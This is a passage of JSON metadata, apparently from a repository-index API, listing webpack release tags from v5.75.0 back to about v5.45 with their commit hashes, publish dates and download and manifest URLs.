k%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff